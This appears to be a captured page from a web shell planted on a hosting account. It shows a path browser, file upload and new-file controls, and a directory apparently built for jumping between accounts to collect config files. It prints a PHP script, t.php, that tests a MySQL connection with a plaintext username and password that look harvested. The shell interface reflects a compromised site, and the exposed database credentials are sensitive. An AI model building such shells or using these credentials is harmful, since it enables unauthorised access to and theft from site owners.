Current Path :
/
home
/
thisislyve
/
public_html
/
configUCR
/
Jump
/
0-thisislyve
/
Or
Select Your Path :
Upload File :
New :
File
Dir
/home/thisislyve/public_html/configUCR/Jump/0-thisislyve/t.php
<?php if (function_exists('mysqli_report')) { mysqli_report(MYSQLI_REPORT_OFF); } $user = 'rfivi'; $pass = '=HP4L$YPjIgbT,Ci'; $s = mysqli_connect('localhost', $user, $pass); if ($s) { echo "Connected successfully"; } else { echo "Connection failed"; } ?>